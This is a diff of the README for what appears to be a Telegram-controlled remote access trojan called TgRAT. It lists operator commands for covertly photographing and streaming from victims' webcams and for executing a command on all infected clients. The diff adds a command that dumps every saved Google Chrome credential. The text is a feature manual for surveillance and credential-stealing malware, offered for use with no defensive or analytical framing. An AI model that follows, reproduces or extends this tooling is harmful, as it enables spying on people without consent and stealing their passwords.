17tayyy/TgRAT/README.md

 - `/listwebcams` – Return the index of available cameras
 - `/photo <camera index>` – Take Photo from the webcam
 - `/stream <camera index> <time> <fps>` – Takes a video from the webcam
+- `/dumpchrome` – Dump all the google chrome credentials

 ### In the main thread (global)
 - `/sendall <command>` – Execute command on all clients